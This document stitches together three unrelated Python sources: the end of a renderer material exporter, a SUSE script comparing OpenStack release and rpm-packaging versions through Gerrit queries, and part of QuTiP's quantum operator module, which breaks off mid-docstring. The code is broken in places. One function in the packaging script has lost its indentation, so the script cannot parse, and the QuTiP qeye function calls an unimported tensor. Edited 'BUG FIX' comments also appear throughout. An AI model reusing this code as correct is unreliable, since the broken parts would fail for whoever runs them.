            operator.w.goIn()

            operator.w.write(":type 'null'")
            operator.w.write(":name '%s-opacity'" % name)

            operator.w.goOut()
            operator.w.write(")")

        # Glass material
        if hasGlass:
            operator.w.write("(material")
            operator.w.goIn()

            operator.w.write(":type 'glass'")
            operator.w.write(":name '%s-glass'" % name)
            # NOTE(review): the 'glass' branch above emits ':specularity';
            # ':specular' here may be a typo - confirm against the format.
            operator.w.write(":specular %s" % spec)
            operator.w.write(":transmission (smul %s %s)" % (tran, spec))
            operator.w.write(":index %s" % eta)

            operator.w.goOut()
            operator.w.write(")")

        # Diffuse material (final name if there is nothing to blend with)
        diffName = "%s-diff" % name if hasOpacity or hasGlass else name
        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'diffuse'")
        operator.w.write(":name '%s'" % diffName)
        operator.w.write(":albedo %s" % diff)

        operator.w.goOut()
        operator.w.write(")")

        # Combine glass with diffuse
        if hasGlass:
            in1 = "%s-mix" % name
            operator.w.write("(material")
            operator.w.goIn()

            operator.w.write(":type 'blend'")
            operator.w.write(":name '%s'" % in1)
            operator.w.write(":material1 '%s'" % diffName)
            operator.w.write(":material2 '%s-glass'" % name)
            operator.w.write(":factor %s" % refl)

            operator.w.goOut()
            operator.w.write(")")
        else:
            in1 = diffName

        # Combine opacity with diffuse or mix of glass and diffuse
        if hasOpacity:
            operator.w.write("(material")
            operator.w.goIn()

            operator.w.write(":type 'blend'")
            operator.w.write(":name '%s'" % name)
            operator.w.write(":material1 '%s-opacity'" % name)
            operator.w.write(":material2 '%s'" % in1)
            operator.w.write(":factor %s" % opacity)

            operator.w.goOut()
            operator.w.write(")")
    elif mat_type == "mix":
        # blend of two previously defined named materials
        mat1 = op.parameters.get("namedmaterial1", "")
        mat2 = op.parameters.get("namedmaterial2", "")
        fac = getScal(operator, op, 'amount', 0.5)

        operator.w.write("(material")
        operator.w.goIn()

        operator.w.write(":type 'mix'")
        operator.w.write(":name '%s'" % name)
        operator.w.write(":material1 '%s'" % mat1)
        operator.w.write(":material2 '%s'" % mat2)
        operator.w.write(":factor %s" % fac)

        operator.w.goOut()
        operator.w.write(")")
    else:
        print("ERROR: No support of materials of type %s for %s available" %
              (mat_type, name))

    # every call consumes one material slot, even on error
    operator.matCount += 1
    return name
| |
#!/usr/bin/python3
# Copyright (c) 2016 SUSE Linux GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from collections import namedtuple
import os
from packaging import version
from packaging.requirements import Requirement
import re
import requests
import sys
import yaml
import json
# the current 'in development' release
CURRENT_MASTER = 'xena'

# the host where to query for open reviews
GERRIT_HOST = 'https://review.opendev.org'

# Per-project status record:
#   release           - highest released version (packaging version object)
#   upper_constraints - version string from upper-constraints.txt, or '-'
#   rpm_packaging_pkg - version found in the rpm-packaging spec template
#   reviews           - list of open gerrit review numbers touching the spec
#   obs_published     - version published in the openbuildservice
V = namedtuple('V', ['release', 'upper_constraints', 'rpm_packaging_pkg',
                     'reviews', 'obs_published'])
def _process_status(args=None):
    """Collect per-project version status for a release and render it.

    args: dict (from vars(argparse.Namespace)) with the keys defined by the
    'status' sub-parser in process_args().
    """
    projects = {}

    upper_constraints = read_upper_constraints(
        os.path.join(args['requirements-git-dir'], 'upper-constraints.txt'))

    # open reviews for the given release
    open_reviews = _gerrit_open_reviews_per_file(args['release'])

    # directory which contains all yaml files from the openstack/release
    # git dir
    releases_yaml_dir = os.path.join(args['releases-git-dir'], 'deliverables',
                                     args['release'])
    releases_indep_yaml_dir = os.path.join(args['releases-git-dir'],
                                           'deliverables', '_independent')
    yaml_files = [os.path.join(releases_indep_yaml_dir, f)
                  for f in os.listdir(releases_indep_yaml_dir)]
    yaml_files += [os.path.join(releases_yaml_dir, f)
                   for f in os.listdir(releases_yaml_dir)]

    for yaml_file in yaml_files:
        project_name = re.sub(r'\.ya?ml$', '', os.path.basename(yaml_file))
        # skip projects if include list is given
        if args['include_projects'] and \
                project_name not in args['include_projects']:
            continue
        with open(yaml_file) as f:
            # deliverable files are plain data - use the safe loader (also
            # required since PyYAML 6 dropped yaml.load()'s default Loader)
            data = yaml.safe_load(f)
        if 'releases' not in data or not data['releases']:
            # there might be yaml files without any releases
            continue
        v_release = find_highest_release_version(data['releases'])
        # use tarball-base name if available
        project_name_pkg = v_release['projects'][0].get('tarball-base',
                                                        project_name)
        # version from upper-constraints.txt, '-' if unconstrained
        v_upper_constraints = upper_constraints.get(project_name, '-')
        # path to the corresponding .spec.j2 file
        rpm_packaging_pkg_project_spec = os.path.join(
            args['rpm-packaging-git-dir'],
            'openstack', project_name_pkg,
            '%s.spec.j2' % project_name_pkg)
        v_rpm_packaging_pkg = find_rpm_packaging_pkg_version(
            rpm_packaging_pkg_project_spec)
        # version from build service published file
        v_obs_published = find_openbuildservice_pkg_version(
            args['obs_published_xml'], project_name)
        # open reviews touching this project's spec
        project_reviews = open_reviews.get(project_name, [])
        # add both versions to the project dict
        projects[project_name] = V(version.parse(v_release['version']),
                                   v_upper_constraints,
                                   v_rpm_packaging_pkg,
                                   project_reviews,
                                   v_obs_published)

    include_obs = args['obs_published_xml']
    if args['format'] == 'text':
        output_text(args['release'], projects, include_obs)
    elif args['format'] == 'html':
        output_html(args['release'], projects, include_obs)
def process_args():
    """Build the CLI parser, parse sys.argv and dispatch to the selected
    sub-command handler."""
    parser = argparse.ArgumentParser(
        description='Compare rpm-packaging with OpenStack releases')
    # Without a sub-command argparse would produce a Namespace without .func
    # and crash below with AttributeError - make the sub-command mandatory.
    subparsers = parser.add_subparsers(help='sub-command help',
                                       dest='subcommand')
    subparsers.required = True

    # subparsers - status
    parser_status = subparsers.add_parser('status', help='status help')
    parser_status.add_argument('releases-git-dir',
                               help='Base directory of the openstack/releases '
                               'git repo', default='releases')
    parser_status.add_argument('rpm-packaging-git-dir',
                               help='Base directory of the '
                               'openstack/rpm-packaging git repo',
                               default='rpm-packaging')
    parser_status.add_argument('requirements-git-dir',
                               help='Base directory of the '
                               'openstack/requirements git repo',
                               default='requirements')
    parser_status.add_argument('--obs-published-xml',
                               help='path to a published xml file from the '
                               'openbuildservice')
    parser_status.add_argument('release',
                               help='name of the release. I.e. "mitaka"',
                               default='mitaka')
    parser_status.add_argument('--include-projects', nargs='*',
                               metavar='project-name', default=[],
                               help='If non-empty, only the given '
                               'projects will be checked. '
                               'default: %(default)s')
    parser_status.add_argument('--format',
                               help='output format', choices=('text', 'html'),
                               default='text')
    parser_status.set_defaults(func=_process_status)

    args = parser.parse_args()
    # dispatch with a plain dict so dashed argument names stay accessible
    args.func(vars(args))
def find_highest_release_version(releases):
    """Given release dicts each carrying a 'version' key, return the dict
    whose version is highest under PEP 440 ordering (ties keep the first)."""
    def _key(release):
        return version.parse(str(release['version']))
    return max(releases, key=_key)
def _rpm_split_filename(filename):
"""Taken from yum's rpmUtils.miscutils.py file
Pass in a standard style rpm fullname
Return a name, version, release, epoch, arch, e.g.::
foo-1.0-1.i386.rpm returns foo, 1.0, 1, i386
1:bar-9-123a.ia64.rpm returns bar, 9, 123a, 1, ia64
"""
if filename[-4:] == '.rpm':
filename = filename[:-4]
archIndex = filename.rfind('.')
arch = filename[archIndex+1:]
relIndex = filename[:archIndex].rfind('-')
rel = filename[relIndex+1:archIndex]
verIndex = filename[:relIndex].rfind('-')
ver = filename[verIndex+1:relIndex]
epochIndex = filename.find(':')
if epochIndex == -1:
epoch = ''
else:
epoch = filename[:epochIndex]
name = filename[epochIndex + 1:verIndex]
return name, ver, rel, epoch, arch
def find_openbuildservice_pkg_version(published_xml, pkg_name):
    """find the version in the openbuildservice published xml for the given
    pkg name; returns version '0' when the file or package is missing"""
    # imported lazily so the script works without these when --obs-published-xml
    # is not used
    import pymod2pkg
    import xml.etree.ElementTree as ET

    if published_xml and os.path.exists(published_xml):
        with open(published_xml) as f:
            tree = ET.fromstring(f.read())
        # translate the python module name to the SUSE distro package name
        distro_pkg_name = pymod2pkg.module2package(pkg_name, 'suse')
        for child in tree:
            # skip meta entries (leading '_') and source rpms
            if not child.attrib['name'].startswith('_') and \
               child.attrib['name'].endswith('.rpm') and not \
               child.attrib['name'].endswith('.src.rpm'):
                (name, ver, release, epoch, arch) = _rpm_split_filename(
                    child.attrib['name'])
                if name == distro_pkg_name:
                    return version.parse(ver)
    # fallback: no xml given, file missing, or package not published
    return version.parse('0')
def find_rpm_packaging_pkg_version(pkg_project_spec):
    """get a spec.j2 template and get the version

    Returns a parsed version, the sentinel string 'version unset' when the
    spec uses the py2rpmversion() template call, or version '0' when the spec
    file is missing or contains no version at all."""
    if os.path.exists(pkg_project_spec):
        with open(pkg_project_spec) as f:
            for line in f:
                # if the template variable 'upstream_version' is set, use that
                m = re.search(
                    r"{%\s*set upstream_version\s*=\s*(?:upstream_version\()?"
                    r"'(?P<version>.*)'(?:\))?\s*%}$", line)
                if m:
                    return version.parse(m.group('version'))
                # check the Version field
                m = re.search(r'^Version:\s*(?P<version>.*)\s*$', line)
                if m:
                    if m.group('version') == '{{ py2rpmversion() }}':
                        # version is rendered at build time - nothing to parse
                        return 'version unset'
                    return version.parse(m.group('version'))
        # no version in spec found
        print('ERROR: no version in %s found' % pkg_project_spec)
        return version.parse('0')
    return version.parse('0')
def _pretty_table(release, projects, include_obs):
    """Build a PrettyTable summarizing each project's packaging status.

    The 'comment' column classifies the rpm-packaging version relative to
    the released version and the upper-constraints pin.
    """
    from prettytable import PrettyTable
    tb = PrettyTable()
    fn = ['name',
          'release (%s)' % release,
          'u-c (%s)' % release,
          'rpm packaging (%s)' % release,
          'reviews']
    if include_obs:
        fn += ['obs']
    fn += ['comment']
    tb.field_names = fn

    for p_name, x in projects.items():
        if x.rpm_packaging_pkg == 'version unset':
            comment = 'ok'
        elif x.rpm_packaging_pkg == version.parse('0'):
            comment = 'unpackaged'
        elif x.rpm_packaging_pkg < x.release:
            comment = 'needs upgrade'
        elif x.rpm_packaging_pkg == x.release:
            # BUG FIX: 'ok' used to be assigned unconditionally here,
            # overwriting the 'needs downgrade (u-c)' verdict.
            if x.upper_constraints != '-' and \
                    x.release > version.parse(x.upper_constraints):
                comment = 'needs downgrade (u-c)'
            else:
                comment = 'ok'
        elif x.rpm_packaging_pkg > x.release:
            comment = 'needs downgrade'
        else:
            comment = ''
        row = [p_name, x.release, x.upper_constraints, x.rpm_packaging_pkg,
               x.reviews]
        if include_obs:
            row += [x.obs_published]
        row += [comment]
        tb.add_row(row)
    return tb
def output_text(release, projects, include_obs):
    """Print the status table as plain text, sorted by the comment column."""
    table = _pretty_table(release, projects, include_obs)
    print(table.get_string(sortby='comment'))
def output_html(release, projects, include_obs):
    """Render the status table as HTML and color the comment cells
    (adjusts the generated markup with an admittedly ugly hack)."""
    from lxml import html
    tb = _pretty_table(release, projects, include_obs)
    s = tb.get_html_string(sortby='comment')
    tree = html.document_fromstring(s)
    tab = tree.cssselect('table')
    tab[0].attrib['style'] = 'border-collapse: collapse;'
    trs = tree.cssselect('tr')
    for t in trs:
        t.attrib['style'] = 'border-bottom:1pt solid black;'
    tds = tree.cssselect('td')
    for t in tds:
        content = t.text_content()
        if content == 'unpackaged':
            t.attrib['style'] = 'background-color:yellow'
        elif content == 'needs upgrade':
            t.attrib['style'] = 'background-color:LightYellow'
        # BUG FIX: `x == (a or b)` only ever compared against `a`, and the
        # second literal said '(uc)' while _pretty_table emits '(u-c)'.
        elif content in ('needs downgrade', 'needs downgrade (u-c)'):
            t.attrib['style'] = 'background-color:red'
        elif content == 'ok':
            t.attrib['style'] = 'background-color:green'
    print(html.tostring(tree))
def read_upper_constraints(filename):
    """Parse upper-constraints.txt into {requirement-name: version-string}."""
    constraints = dict()
    with open(filename) as f:
        for line in f:
            # ignore environment markers for now
            requirement = Requirement(line.split(';')[0])
            for spec in requirement.specifier:
                constraints[requirement.name] = spec.version
                # there is only a single version in upper constraints
                break
    return constraints
def _gerrit_open_reviews_per_file(release):
    """Returns a dict with filename as key and a list of review numbers
    where this file is modified as value"""
    # NOTE: gerrit has a strange first line in the returned data
    # (the XSSI-protection prefix ")]}'") that must be removed before
    # the body can be parsed as JSON.
    # NOTE(review): str.lstrip() strips a *set* of characters, not a
    # prefix; this works here only because valid JSON never starts with
    # one of ) ] } ' \n -- a prefix removal would be clearer.
    gerrit_strip = ')]}\'\n'
    data = dict()
    if release == CURRENT_MASTER:
        branch = 'master'
    else:
        branch = 'stable/%s' % release
    # List all open reviews on the rpm-packaging project for this branch.
    url_reviews = GERRIT_HOST + '/changes/?q=status:open+project:openstack/' \
                  'rpm-packaging+branch:%s' % branch
    res_reviews = requests.get(url_reviews)
    if res_reviews.status_code == 200:
        data_reviews = json.loads(res_reviews.text.lstrip(gerrit_strip))
        for review in data_reviews:
            # For each open review, fetch the file list of its current
            # patch set.
            url_files = GERRIT_HOST + '/changes/%s/revisions/current/files/' \
                        % review['change_id']
            res_files = requests.get(url_files)
            if res_files.status_code == 200:
                data_files = json.loads(res_files.text.lstrip(gerrit_strip))
                for f in data_files.keys():
                    # extract project name from paths that look like
                    # openstack/<project>/<...>spec.j2
                    if f.startswith('openstack/') and f.endswith('spec.j2'):
                        f = f.split('/')[1]
                        data.setdefault(f, []).append(review['_number'])
    return data
def main():
    """Script entry point; delegates all work to process_args()."""
    process_args()
    return 0


if __name__ == '__main__':
    sys.exit(main())
| |
# This file is part of QuTiP: Quantum Toolbox in Python.
#
# Copyright (c) 2011 and later, Paul D. Nation and Robert J. Johansson.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the QuTiP: Quantum Toolbox in Python nor the names
# of its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
"""
This module contains functions for generating Qobj representation of a variety
of commonly occuring quantum operators.
"""
# Public API of this module: spin, oscillator and utility operators.
__all__ = ['jmat', 'spin_Jx', 'spin_Jy', 'spin_Jz', 'spin_Jm', 'spin_Jp',
           'spin_J_set', 'sigmap', 'sigmam', 'sigmax', 'sigmay', 'sigmaz',
           'destroy', 'create', 'qeye', 'identity', 'position', 'momentum',
           'num', 'squeeze', 'squeezing', 'displace', 'commutator',
           'qutrit_ops', 'qdiags', 'phase', 'qzero', 'enr_destroy',
           'enr_identity', 'charge', 'tunneling']
import numpy as np
import scipy
import scipy.sparse as sp
from qutip.qobj import Qobj
from qutip.fastsparse import fast_csr_matrix, fast_identity
#
# Spin operators
#
def jmat(j, *args):
    """Higher-order spin operators:

    Parameters
    ----------
    j : float
        Spin of operator (non-negative integer or half-integer).

    args : str
        Which operator to return 'x','y','z','+','-'.
        If no args given, then output is ['x','y','z']

    Returns
    -------
    jmat : qobj / ndarray
        ``qobj`` for requested spin operator(s).

    Raises
    ------
    TypeError
        If ``j`` is not a non-negative integer/half-integer or the
        requested operator label is unknown.

    Examples
    --------
    >>> jmat(1)
    [ Quantum object: dims = [[3], [3]], \
shape = [3, 3], type = oper, isHerm = True
    Qobj data =
    [[ 0.          0.70710678  0.        ]
     [ 0.70710678  0.          0.70710678]
     [ 0.          0.70710678  0.        ]]
    ...]

    Notes
    -----
    If no 'args' input, then returns array of ['x','y','z'] operators.
    """
    # BUG FIX: scipy.fix was deprecated and then removed from SciPy's top
    # namespace; np.fix is the drop-in replacement for checking that 2*j
    # is an integer (i.e. j is an integer or half-integer).
    if (np.fix(2 * j) != 2 * j) or (j < 0):
        raise TypeError('j must be a non-negative integer or half-integer')

    if not args:
        return jmat(j, 'x'), jmat(j, 'y'), jmat(j, 'z')

    # All components are built from J+ (and its Hermitian conjugate J-).
    if args[0] == '+':
        A = _jplus(j)
    elif args[0] == '-':
        A = _jplus(j).getH()
    elif args[0] == 'x':
        A = 0.5 * (_jplus(j) + _jplus(j).getH())
    elif args[0] == 'y':
        A = -0.5 * 1j * (_jplus(j) - _jplus(j).getH())
    elif args[0] == 'z':
        A = _jz(j)
    else:
        raise TypeError('Invalid type')

    return Qobj(A)
def _jplus(j):
    """
    Internal function for generating the CSR data representing the J-plus
    operator for spin ``j``.
    """
    # m runs over the magnetic quantum numbers j, j-1, ..., -j.
    m = np.arange(j, -j - 1, -1, dtype=complex)
    # Matrix elements sqrt(j(j+1) - m(m+1)) on the first superdiagonal.
    data = (np.sqrt(j * (j + 1.0) - (m + 1.0) * m))[1:]
    N = m.shape[0]
    ind = np.arange(1, N, dtype=np.int32)
    # Row pointer: rows 0..N-2 hold one entry each; the last row is empty,
    # so the final two pointers are both N-1.  (The original additionally
    # re-assigned ptr[-1] = N-1 afterwards, which was a no-op and has been
    # removed.)
    ptr = np.array(list(range(N - 1)) + [N - 1] * 2, dtype=np.int32)
    return fast_csr_matrix((data, ind, ptr), shape=(N, N))
def _jz(j):
    """
    Internal functions for generating the data representing the J-z operator.
    """
    N = int(2*j+1)
    # Diagonal entries j, j-1, ..., -j with any exact zero omitted, since
    # the CSR structure below stores only nonzero elements.
    data = np.array([j-k for k in range(N) if (j-k)!=0], dtype=complex)
    # Even shaped matrix: no zero appears on the diagonal, so every row
    # holds exactly one stored entry.
    if (N % 2 == 0):
        ind = np.arange(N, dtype=np.int32)
        ptr = np.arange(N+1,dtype=np.int32)
        ptr[-1] = N
    # Odd shaped matrix: row j (the middle row) has a zero diagonal entry,
    # so that row is skipped in the column indices and the row pointer
    # repeats at position j.
    else:
        j = int(j)
        ind = np.array(list(range(j))+list(range(j+1,N)), dtype=np.int32)
        ptr = np.array(list(range(j+1))+list(range(j,N)), dtype=np.int32)
        ptr[-1] = N-1
    return fast_csr_matrix((data,ind,ptr), shape=(N,N))
#
# Spin j operators:
#
def spin_Jx(j):
    """Return the x-component spin operator for spin ``j``.

    Parameters
    ----------
    j : float
        Spin quantum number (integer or half-integer).

    Returns
    -------
    op : Qobj
        The J_x operator as a quantum object.
    """
    return jmat(j, 'x')
def spin_Jy(j):
    """Return the y-component spin operator for spin ``j``.

    Parameters
    ----------
    j : float
        Spin quantum number (integer or half-integer).

    Returns
    -------
    op : Qobj
        The J_y operator as a quantum object.
    """
    return jmat(j, 'y')
def spin_Jz(j):
    """Return the z-component spin operator for spin ``j``.

    Parameters
    ----------
    j : float
        Spin quantum number (integer or half-integer).

    Returns
    -------
    op : Qobj
        The J_z operator as a quantum object.
    """
    return jmat(j, 'z')
def spin_Jm(j):
    """Return the lowering (annihilation) spin operator for spin ``j``.

    Parameters
    ----------
    j : float
        Spin quantum number (integer or half-integer).

    Returns
    -------
    op : Qobj
        The J_minus operator as a quantum object.
    """
    return jmat(j, '-')
def spin_Jp(j):
    """Return the raising (creation) spin operator for spin ``j``.

    Parameters
    ----------
    j : float
        Spin quantum number (integer or half-integer).

    Returns
    -------
    op : Qobj
        The J_plus operator as a quantum object.
    """
    return jmat(j, '+')
def spin_J_set(j):
    """Return the triple (J_x, J_y, J_z) of spin-``j`` operators.

    Parameters
    ----------
    j : float
        Spin quantum number (integer or half-integer).

    Returns
    -------
    tuple of Qobj
        The three Cartesian spin operators.
    """
    return jmat(j)
#
# Pauli spin 1/2 operators:
#
def sigmap():
    """Creation operator for Pauli spins.

    Examples
    --------
    >>> sigmap()
    Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = False
    Qobj data =
    [[ 0.  1.]
     [ 0.  0.]]

    """
    return jmat(1 / 2., '+')
def sigmam():
    """Annihilation (lowering) operator for a Pauli spin-1/2.

    Examples
    --------
    >>> sigmam()
    Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = False
    Qobj data =
    [[ 0.  0.]
     [ 1.  0.]]

    """
    return jmat(0.5, '-')
def sigmax():
    """Pauli spin 1/2 sigma-x operator

    Examples
    --------
    >>> sigmax()
    Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = True
    Qobj data =
    [[ 0.  1.]
     [ 1.  0.]]

    """
    return 2.0 * jmat(1.0 / 2, 'x')
def sigmay():
    """Pauli sigma-y operator for a spin-1/2 system.

    Examples
    --------
    >>> sigmay()
    Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = True
    Qobj data =
    [[ 0.+0.j  0.-1.j]
     [ 0.+1.j  0.+0.j]]

    """
    return 2.0 * jmat(0.5, 'y')
def sigmaz():
    """Pauli sigma-z operator for a spin-1/2 system.

    Examples
    --------
    >>> sigmaz()
    Quantum object: dims = [[2], [2]], \
shape = [2, 2], type = oper, isHerm = True
    Qobj data =
    [[ 1.  0.]
     [ 0. -1.]]

    """
    return 2.0 * jmat(0.5, 'z')
#
# DESTROY returns annihilation operator for N dimensional Hilbert space
# out = destroy(N), N is integer value & N>0
#
def destroy(N, offset=0):
    """Destruction (lowering) operator.

    Parameters
    ----------
    N : int
        Dimension of Hilbert space.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper : qobj
        Qobj for lowering operator.

    Raises
    ------
    ValueError
        If ``N`` is not an integer.
    """
    if not isinstance(N, (int, np.integer)):
        raise ValueError("Hilbert space dimension must be integer value")
    # Superdiagonal entries sqrt(offset+1) ... sqrt(offset+N-1).
    elems = np.sqrt(np.arange(offset + 1, N + offset, dtype=complex))
    cols = np.arange(1, N, dtype=np.int32)
    # One entry per row except the last row, which is empty, hence the
    # repeated final pointer N-1.
    row_ptr = np.array(list(range(N)) + [N - 1], dtype=np.int32)
    matrix = fast_csr_matrix((elems, cols, row_ptr), shape=(N, N))
    return Qobj(matrix, isherm=False)
#
# create returns creation operator for N dimensional Hilbert space
# out = create(N), N is integer value & N>0
#
def create(N, offset=0):
    '''Creation (raising) operator.

    Parameters
    ----------
    N : int
        Dimension of Hilbert space.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper : qobj
        Qobj for raising operator.

    Examples
    --------
    >>> create(4)
    Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = False
    Qobj data =
    [[ 0.00000000+0.j  0.00000000+0.j  0.00000000+0.j  0.00000000+0.j]
     [ 1.00000000+0.j  0.00000000+0.j  0.00000000+0.j  0.00000000+0.j]
     [ 0.00000000+0.j  1.41421356+0.j  0.00000000+0.j  0.00000000+0.j]
     [ 0.00000000+0.j  0.00000000+0.j  1.73205081+0.j  0.00000000+0.j]]

    '''
    if not isinstance(N, (int, np.integer)):  # raise error if N not integer
        raise ValueError("Hilbert space dimension must be integer value")
    # The raising operator is the adjoint of the lowering operator.
    qo = destroy(N, offset=offset)  # create operator using destroy function
    return qo.dag()
#
# QEYE returns identity operator for an N dimensional space
# a = qeye(N), N is integer & N>0
#
def qeye(N):
    """
    Identity operator

    Parameters
    ----------
    N : int or list of ints
        Dimension of Hilbert space. If provided as a list of ints,
        then the dimension is the product over this list, but the
        ``dims`` property of the new Qobj are set to this list.

    Returns
    -------
    oper : qobj
        Identity operator Qobj.
    """
    # A list of dimensions yields the tensor product of identities.
    if isinstance(N, list):
        return tensor(*map(identity, N))
    N = int(N)
    if N < 0:
        raise ValueError("N must be integer N>=0")
    return Qobj(fast_identity(N), isherm=True)
def identity(N):
    """Identity operator. Alternative name to :func:`qeye`.

    Parameters
    ----------
    N : int or list of ints
        Hilbert space dimension, or a list of subsystem dimensions
        (the resulting ``dims`` follow the list).

    Returns
    -------
    oper : qobj
        Identity operator Qobj.
    """
    return qeye(N)
def position(N, offset=0):
    """
    Position operator x=1/sqrt(2)*(a+a.dag())

    Parameters
    ----------
    N : int
        Number of Fock states in Hilbert space.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper : qobj
        Position operator as Qobj.
    """
    lowering = destroy(N, offset=offset)
    return 1.0 / np.sqrt(2.0) * (lowering + lowering.dag())
def momentum(N, offset=0):
    """
    Momentum operator p=-1j/sqrt(2)*(a-a.dag())

    Parameters
    ----------
    N : int
        Number of Fock states in Hilbert space.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper : qobj
        Momentum operator as Qobj.
    """
    lowering = destroy(N, offset=offset)
    return -1j / np.sqrt(2.0) * (lowering - lowering.dag())
def num(N, offset=0):
    """Quantum object for number operator.

    Parameters
    ----------
    N : int
        The dimension of the Hilbert space.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper: qobj
        Qobj for number operator.

    Examples
    --------
    >>> num(4)
    Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isHerm = True
    Qobj data =
    [[0 0 0 0]
     [0 1 0 0]
     [0 0 2 0]
     [0 0 0 3]]
    """
    if offset == 0:
        # The (0, 0) diagonal entry is exactly zero, so it is omitted from
        # the stored data: row 0 is empty and the row pointer repeats 0.
        data = np.arange(1,N, dtype=complex)
        ind = np.arange(1,N, dtype=np.int32)
        ptr = np.array([0]+list(range(0,N)), dtype=np.int32)
        ptr[-1] = N-1
    else:
        # With a nonzero offset every diagonal entry is stored.
        data = np.arange(offset, offset + N, dtype=complex)
        ind = np.arange(N, dtype=np.int32)
        ptr = np.arange(N+1,dtype=np.int32)
        ptr[-1] = N
    return Qobj(fast_csr_matrix((data,ind,ptr), shape=(N,N)), isherm=True)
def squeeze(N, z, offset=0):
    """Single-mode Squeezing operator.

    Parameters
    ----------
    N : int
        Dimension of hilbert space.

    z : float/complex
        Squeezing parameter.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper : :class:`qutip.qobj.Qobj`
        Squeezing operator.
    """
    lowering = destroy(N, offset=offset)
    # Exponentiate the squeezing generator (z* a^2 - z a^dag^2) / 2.
    generator = 0.5 * np.conj(z) * (lowering ** 2) \
        - 0.5 * z * (lowering.dag()) ** 2
    return generator.expm()
def squeezing(a1, a2, z):
    """Generalized squeezing operator.

    .. math::

        S(z) = \\exp\\left(\\frac{1}{2}\\left(z^*a_1a_2
        - za_1^\\dagger a_2^\\dagger\\right)\\right)

    Parameters
    ----------
    a1 : :class:`qutip.qobj.Qobj`
        Operator 1.

    a2 : :class:`qutip.qobj.Qobj`
        Operator 2.

    z : float/complex
        Squeezing parameter.

    Returns
    -------
    oper : :class:`qutip.qobj.Qobj`
        Squeezing operator.
    """
    generator = 0.5 * (np.conj(z) * (a1 * a2) - z * (a1.dag() * a2.dag()))
    return generator.expm()
def displace(N, alpha, offset=0):
    """Single-mode displacement operator.

    Parameters
    ----------
    N : int
        Dimension of Hilbert space.

    alpha : float/complex
        Displacement amplitude.

    offset : int (default 0)
        The lowest number state that is included in the finite number state
        representation of the operator.

    Returns
    -------
    oper : qobj
        Displacement operator.
    """
    lowering = destroy(N, offset=offset)
    # D(alpha) = exp(alpha a^dag - alpha* a)
    return (alpha * lowering.dag() - np.conj(alpha) * lowering).expm()
def commutator(A, B, kind="normal"):
    """
    Return the commutator of kind `kind` (normal, anti) of the
    two operators A and B.
    """
    if kind == 'normal':
        return A * B - B * A
    if kind == 'anti':
        return A * B + B * A
    raise TypeError("Unknown commutator kind '%s'" % kind)
def qutrit_ops():
    """
    Operators for a three level system (qutrit).

    Returns
    -------
    opers: array
        `array` of qutrit operators.
    """
    from qutip.states import qutrit_basis

    one, two, three = qutrit_basis()
    # Three projectors followed by the three transition operators,
    # in the same order as before: 11, 22, 33, 12, 23, 31.
    operators = [
        one * one.dag(),
        two * two.dag(),
        three * three.dag(),
        one * two.dag(),
        two * three.dag(),
        three * one.dag(),
    ]
    return np.array(operators, dtype=object)
def qdiags(diagonals, offsets, dims=None, shape=None):
    """
    Constructs an operator from an array of diagonals.

    Parameters
    ----------
    diagonals : sequence of array_like
        Array of elements to place along the selected diagonals.

    offsets : sequence of ints
        Sequence for diagonals to be set:
            - k=0 main diagonal
            - k>0 kth upper diagonal
            - k<0 kth lower diagonal

    dims : list, optional
        Dimensions for operator

    shape : list, tuple, optional
        Shape of operator.  If omitted, a square operator large enough
        to contain the diagonals is generated.

    See Also
    --------
    scipy.sparse.diags for usage information.

    Notes
    -----
    This function requires SciPy 0.11+.

    Examples
    --------
    >>> qdiags(sqrt(range(1,4)),1)
    Quantum object: dims = [[4], [4]], \
shape = [4, 4], type = oper, isherm = False
    Qobj data =
